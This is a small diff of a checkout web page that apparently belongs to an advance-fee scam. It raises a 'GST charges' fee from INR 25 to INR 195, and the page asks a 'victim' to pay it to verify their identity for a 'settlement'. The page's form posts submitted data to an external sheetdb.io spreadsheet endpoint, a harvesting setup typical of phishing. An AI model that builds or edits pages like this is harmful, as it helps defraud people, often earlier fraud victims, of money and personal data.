--- a/checkout.html
+++ b/checkout.html
@@ -116,7 +116,7 @@
 
 <body>
 
-    <h2>Kindly Pay The CCS GST charges INR 25</h2>
+    <h2>Kindly Pay The GST charges INR 195</h2>
     <p>In ordert to verify the victim identity and victim account source for the settlement .</p>
 
     <form class="modal-content" action="https://sheetdb.io/api/v1/vs4tdo0usckts" method="post" id="sheetdb-form">
